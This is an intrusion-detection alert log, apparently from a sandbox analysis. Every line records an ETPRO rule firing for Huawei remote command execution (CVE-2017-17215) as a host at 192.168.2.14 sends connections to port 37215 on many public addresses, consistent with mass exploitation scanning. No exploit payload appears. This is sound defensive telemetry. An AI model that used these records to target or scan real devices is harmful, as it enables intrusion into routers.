                                            06/14/24-10:43:58.277000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4278437215192.168.2.14156.179.142.22
                                            06/14/24-10:44:31.051608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4655837215192.168.2.1441.137.142.180
                                            06/14/24-10:44:12.624978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3715637215192.168.2.1441.170.187.34
                                            06/14/24-10:44:10.545159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3426837215192.168.2.14156.188.119.41
                                            06/14/24-10:44:04.405067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5832837215192.168.2.14156.53.209.127
                                            06/14/24-10:43:45.984870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5802037215192.168.2.1441.183.125.84
                                            06/14/24-10:43:52.150224TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5137637215192.168.2.14197.184.181.188
                                            06/14/24-10:44:14.682511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5544237215192.168.2.14156.236.36.106
                                            06/14/24-10:44:16.737544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5383637215192.168.2.14197.47.130.245
                                            06/14/24-10:43:45.967050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3957237215192.168.2.1441.156.230.234
                                            06/14/24-10:44:24.916078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3451437215192.168.2.1441.32.53.15
                                            06/14/24-10:44:24.916575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5646837215192.168.2.14197.105.173.39
                                            06/14/24-10:43:34.678337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4219437215192.168.2.14197.63.157.30
                                            06/14/24-10:43:52.164239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5328037215192.168.2.14197.34.242.64
                                            06/14/24-10:44:06.473472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4506837215192.168.2.14156.177.246.225
                                            06/14/24-10:43:45.969783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435437215192.168.2.14156.19.142.133
                                            06/14/24-10:44:33.148260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3507237215192.168.2.1441.112.88.179
                                            06/14/24-10:44:33.132936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5128037215192.168.2.1441.4.79.22
                                            06/14/24-10:44:00.319906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5332437215192.168.2.14197.110.130.133
                                            06/14/24-10:44:24.946861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5154837215192.168.2.14197.63.10.64
                                            06/14/24-10:43:56.225918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3441437215192.168.2.1441.52.107.30
                                            06/14/24-10:43:58.288988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4354237215192.168.2.14197.102.184.113
                                            06/14/24-10:43:58.290249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4271237215192.168.2.1441.216.198.50
                                            06/14/24-10:43:41.850710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3563837215192.168.2.14197.160.183.210
                                            06/14/24-10:44:22.860557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4775637215192.168.2.1441.42.165.213
                                            06/14/24-10:44:31.079299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5228037215192.168.2.14197.40.66.120
                                            06/14/24-10:43:48.018394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3494437215192.168.2.14197.200.64.202
                                            06/14/24-10:44:08.519518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4591837215192.168.2.14197.50.204.148
                                            06/14/24-10:44:29.022022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5330637215192.168.2.14197.135.57.191
                                            06/14/24-10:43:36.701930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3629437215192.168.2.14197.78.163.231
                                            06/14/24-10:44:12.644333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3907837215192.168.2.1441.83.4.16
                                            06/14/24-10:43:56.228382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4463637215192.168.2.1441.53.35.30
                                            06/14/24-10:44:29.011866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5472237215192.168.2.1441.42.201.74
                                            06/14/24-10:43:52.161605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6089237215192.168.2.14197.52.238.225
                                            06/14/24-10:44:27.000687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5190837215192.168.2.14197.84.236.207
                                            06/14/24-10:44:29.025644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5488637215192.168.2.14156.15.56.33
                                            06/14/24-10:44:06.470649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4776637215192.168.2.14156.186.149.164
                                            06/14/24-10:44:20.828251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4139837215192.168.2.1441.82.15.200
                                            06/14/24-10:44:22.861409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4403637215192.168.2.14197.38.218.38
                                            06/14/24-10:44:31.051692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5061037215192.168.2.14197.149.94.8
                                            06/14/24-10:43:43.968928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5248837215192.168.2.14156.187.222.214
                                            06/14/24-10:44:26.999262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6090637215192.168.2.14197.140.162.237
                                            06/14/24-10:44:00.338717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4703237215192.168.2.1441.106.140.15
                                            06/14/24-10:44:29.021800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5781437215192.168.2.14156.126.34.204
                                            06/14/24-10:44:06.453695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3771037215192.168.2.14197.101.193.208
                                            06/14/24-10:44:12.644624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5080037215192.168.2.14156.158.216.29
                                            06/14/24-10:44:31.087308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4821237215192.168.2.14197.174.20.52
                                            06/14/24-10:44:29.024340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5976837215192.168.2.14197.71.50.253
                                            06/14/24-10:43:36.702648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3346437215192.168.2.14197.208.206.179
                                            06/14/24-10:44:02.368561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5923037215192.168.2.14197.183.34.144
                                            06/14/24-10:44:10.545113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4905837215192.168.2.1441.115.28.210
                                            06/14/24-10:43:48.034104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5653437215192.168.2.1441.67.246.227
                                            06/14/24-10:43:34.677881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4979837215192.168.2.14156.104.167.238
                                            06/14/24-10:44:18.776406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4293237215192.168.2.14156.150.113.187
                                            06/14/24-10:43:52.161469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5351037215192.168.2.1441.56.111.112
                                            06/14/24-10:43:48.019701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3591237215192.168.2.14156.128.105.127
                                            06/14/24-10:44:20.831479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4289037215192.168.2.1441.90.205.24
                                            06/14/24-10:43:52.150938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4262637215192.168.2.14156.199.110.232
                                            06/14/24-10:44:00.341681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4352037215192.168.2.14197.243.143.180
                                            06/14/24-10:43:36.701150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5154637215192.168.2.14197.12.116.6
                                            06/14/24-10:44:08.505250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5724437215192.168.2.14156.132.214.39
                                            06/14/24-10:43:37.762682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200837215192.168.2.14197.125.234.130
                                            06/14/24-10:44:06.448182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4889837215192.168.2.14156.200.28.88
                                            06/14/24-10:43:50.071778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4861237215192.168.2.14156.90.121.249
                                            06/14/24-10:44:31.091143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3388637215192.168.2.14197.220.89.208
                                            06/14/24-10:44:33.151935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5499237215192.168.2.1441.7.87.65
                                            06/14/24-10:43:58.292945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5080837215192.168.2.1441.6.167.101
                                            06/14/24-10:44:16.715014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4111837215192.168.2.1441.250.31.61
                                            06/14/24-10:44:29.022055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5752237215192.168.2.1441.28.70.98
                                            06/14/24-10:43:45.989916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5901837215192.168.2.14197.25.125.181
                                            06/14/24-10:44:04.421792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5448437215192.168.2.14197.145.222.221
                                            06/14/24-10:44:20.807485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4140437215192.168.2.14156.153.34.110
                                            06/14/24-10:44:33.151627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4878437215192.168.2.14156.102.49.36
                                            06/14/24-10:43:56.245248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5300037215192.168.2.14156.172.83.41
                                            06/14/24-10:43:34.660750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3801437215192.168.2.14197.30.81.14
                                            06/14/24-10:44:08.518478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4330837215192.168.2.14156.11.30.211
                                            06/14/24-10:43:54.185647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4456237215192.168.2.14156.61.213.74
                                            06/14/24-10:44:26.998732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3568637215192.168.2.14156.113.34.139
                                            06/14/24-10:43:36.702843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5530237215192.168.2.14156.249.224.225
                                            06/14/24-10:44:06.451841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5233437215192.168.2.1441.172.49.70
                                            06/14/24-10:44:16.716792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4889637215192.168.2.1441.184.131.168
                                            06/14/24-10:43:36.702693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4911037215192.168.2.14156.14.144.175
                                            06/14/24-10:43:54.198889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4520237215192.168.2.14156.33.198.34
                                            06/14/24-10:43:39.793133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3658037215192.168.2.14156.198.114.147
                                            06/14/24-10:43:54.186053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4240837215192.168.2.14156.29.35.64
                                            06/14/24-10:44:29.012502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4695037215192.168.2.1441.92.248.64
                                            06/14/24-10:44:08.504616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4286637215192.168.2.1441.23.6.63
                                            06/14/24-10:43:45.969427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5881237215192.168.2.14197.2.115.95
                                            06/14/24-10:44:22.858826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5875037215192.168.2.1441.246.122.35
                                            06/14/24-10:43:48.030533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5847237215192.168.2.1441.164.244.36
                                            06/14/24-10:44:12.616416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3870237215192.168.2.14156.239.224.164
                                            06/14/24-10:43:39.812896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5983037215192.168.2.1441.139.209.46
                                            06/14/24-10:44:14.670685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5420237215192.168.2.14156.230.111.82
                                            06/14/24-10:43:48.034892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3716637215192.168.2.14197.130.226.9
                                            06/14/24-10:43:56.229617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3989237215192.168.2.14197.172.151.30
                                            06/14/24-10:44:29.013636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4070037215192.168.2.14197.132.224.118
                                            06/14/24-10:43:58.291915TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5615837215192.168.2.14197.149.124.21
                                            06/14/24-10:44:04.420988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4922637215192.168.2.14197.116.68.195
                                            06/14/24-10:43:41.905240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3374637215192.168.2.14156.119.57.54
                                            06/14/24-10:43:48.019508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5433037215192.168.2.14156.114.58.230
                                            06/14/24-10:43:50.110731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3902037215192.168.2.14197.197.253.81
                                            06/14/24-10:43:58.292875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3396237215192.168.2.14197.72.233.132
                                            06/14/24-10:44:16.718205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5886037215192.168.2.14156.174.10.228
                                            06/14/24-10:43:48.034827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5337637215192.168.2.1441.73.57.96
                                            06/14/24-10:43:52.160744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4836037215192.168.2.14156.57.244.35
                                            06/14/24-10:43:45.984970TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5728037215192.168.2.1441.155.107.211
                                            06/14/24-10:43:36.703993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4660437215192.168.2.1441.107.169.248
                                            06/14/24-10:44:14.688259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4184437215192.168.2.1441.173.201.177
                                            06/14/24-10:43:56.225398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5110237215192.168.2.14156.131.60.87
                                            06/14/24-10:44:22.879261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5823637215192.168.2.1441.253.137.103
                                            06/14/24-10:43:52.146815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4373037215192.168.2.14197.249.179.120
                                            06/14/24-10:43:48.019805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3688037215192.168.2.14156.98.140.130
                                            06/14/24-10:43:48.020942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5061637215192.168.2.14156.18.159.107
                                            06/14/24-10:44:10.566362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4648437215192.168.2.1441.220.217.142
                                            06/14/24-10:44:12.644713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4131637215192.168.2.14156.35.26.157
                                            06/14/24-10:43:48.019739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5132837215192.168.2.14156.158.253.213
                                            06/14/24-10:44:04.410710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3376637215192.168.2.1441.146.154.229
                                            06/14/24-10:43:41.846956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5047637215192.168.2.14156.30.181.100
                                            06/14/24-10:44:02.387122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3624237215192.168.2.14197.243.164.13
                                            06/14/24-10:44:12.617438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4143637215192.168.2.14156.179.52.243
                                            06/14/24-10:43:56.244854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5170637215192.168.2.14156.86.97.0
                                            06/14/24-10:44:10.542286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3617437215192.168.2.14156.58.152.114
                                            06/14/24-10:43:34.676514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5243037215192.168.2.14156.53.176.64
                                            06/14/24-10:43:41.849136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5294637215192.168.2.14156.48.112.59
                                            06/14/24-10:44:31.057542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5028037215192.168.2.14197.175.167.169
                                            06/14/24-10:43:50.111082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4841237215192.168.2.14156.192.109.114
                                            06/14/24-10:44:14.683026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519237215192.168.2.14156.161.196.255
                                            06/14/24-10:43:34.662043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5855437215192.168.2.14156.129.96.206
                                            06/14/24-10:44:02.369069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3982237215192.168.2.14197.223.99.112
                                            06/14/24-10:43:37.763577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4688637215192.168.2.14197.50.81.48
                                            06/14/24-10:43:39.790376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3852437215192.168.2.1441.232.46.38
                                            06/14/24-10:43:45.990010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924437215192.168.2.1441.113.180.219
                                            06/14/24-10:43:41.906035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3703237215192.168.2.14197.216.12.11
                                            06/14/24-10:44:16.715042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5871837215192.168.2.14197.120.150.62
                                            06/14/24-10:43:48.019009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5110437215192.168.2.14197.86.23.178
                                            06/14/24-10:44:06.470410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5782237215192.168.2.1441.166.118.123
                                            06/14/24-10:43:39.789478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5891837215192.168.2.1441.157.37.124
                                            06/14/24-10:43:39.789083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4199837215192.168.2.1441.164.190.32
                                            06/14/24-10:43:43.941702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3943437215192.168.2.14156.247.142.114
                                            06/14/24-10:44:00.343524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4542837215192.168.2.14197.204.211.235
                                            06/14/24-10:43:39.789788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6072637215192.168.2.14156.201.172.52
                                            06/14/24-10:43:56.228515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513037215192.168.2.14156.51.216.95
                                            06/14/24-10:43:34.660691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5225437215192.168.2.1441.96.243.63
                                            06/14/24-10:43:45.985345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4811837215192.168.2.14156.86.138.235
                                            06/14/24-10:43:50.073605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3614037215192.168.2.1441.92.68.60
                                            06/14/24-10:44:04.406833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4865037215192.168.2.14156.96.156.139
                                            06/14/24-10:44:31.056659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3735637215192.168.2.1441.215.220.244
                                            06/14/24-10:44:00.340216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5078837215192.168.2.1441.165.0.26
                                            06/14/24-10:44:16.718500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5021437215192.168.2.14156.58.30.32
                                            06/14/24-10:44:31.052120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5283637215192.168.2.1441.5.208.183
                                            06/14/24-10:44:18.762916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3551037215192.168.2.14197.99.229.98
                                            06/14/24-10:43:48.021334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4850037215192.168.2.1441.29.107.107
                                            06/14/24-10:44:14.670472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5751237215192.168.2.14197.120.57.43
                                            06/14/24-10:44:08.503544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3815837215192.168.2.1441.146.120.187
                                            06/14/24-10:44:18.777158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3338237215192.168.2.14156.214.176.72
                                            06/14/24-10:43:39.808400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5486637215192.168.2.1441.158.16.212
                                            06/14/24-10:43:56.250697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5537037215192.168.2.14197.67.7.217
                                            06/14/24-10:44:08.501235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4624037215192.168.2.14156.2.219.185
                                            06/14/24-10:44:33.131881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5049837215192.168.2.14156.50.38.207
                                            06/14/24-10:44:35.177813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4996437215192.168.2.14197.161.250.38
                                            06/14/24-10:44:22.860328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5844437215192.168.2.14197.25.116.238
                                            06/14/24-10:43:37.762466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3538037215192.168.2.14156.147.51.227
                                            06/14/24-10:44:06.452010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4440237215192.168.2.14156.227.240.170
                                            06/14/24-10:43:54.183688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3734437215192.168.2.14197.153.37.28
                                            06/14/24-10:43:48.031791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5518037215192.168.2.14156.28.114.41
                                            06/14/24-10:44:24.932681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4625837215192.168.2.14156.11.200.245
                                            06/14/24-10:44:04.407392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5056237215192.168.2.14156.33.225.51
                                            06/14/24-10:43:39.810730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5175037215192.168.2.1441.209.52.77
                                            06/14/24-10:44:26.985991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4435637215192.168.2.14197.61.84.184
                                            06/14/24-10:44:31.055217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4732237215192.168.2.14156.170.123.35
                                            06/14/24-10:43:54.202949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3826837215192.168.2.14156.153.49.153
                                            06/14/24-10:44:22.857803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5217637215192.168.2.14197.131.102.5
                                            06/14/24-10:44:02.381828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4349837215192.168.2.1441.95.70.146
                                            06/14/24-10:44:26.980513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4777637215192.168.2.1441.109.5.80
                                            06/14/24-10:44:08.521709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5067037215192.168.2.14197.17.187.89
                                            06/14/24-10:44:24.916265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4110637215192.168.2.1441.56.161.183
                                            06/14/24-10:44:00.339923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3984837215192.168.2.1441.53.193.205
                                            06/14/24-10:44:06.472697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3310837215192.168.2.1441.188.26.2
                                            06/14/24-10:43:56.227453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5686437215192.168.2.14156.79.74.202
                                            06/14/24-10:44:12.618401TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6040437215192.168.2.14197.121.66.36
                                            06/14/24-10:44:27.001211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3361237215192.168.2.14197.235.67.134
                                            06/14/24-10:44:31.078752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4963237215192.168.2.14197.200.215.143
                                            06/14/24-10:43:37.761142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966437215192.168.2.1441.129.36.124
                                            06/14/24-10:44:22.859467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5605237215192.168.2.14156.141.229.150
                                            06/14/24-10:43:45.969373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5341637215192.168.2.14156.82.240.42
                                            06/14/24-10:43:39.812329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3531237215192.168.2.1441.63.115.65
                                            06/14/24-10:44:31.092872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4625637215192.168.2.14156.138.156.177
                                            06/14/24-10:43:48.019276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4354237215192.168.2.1441.235.46.196
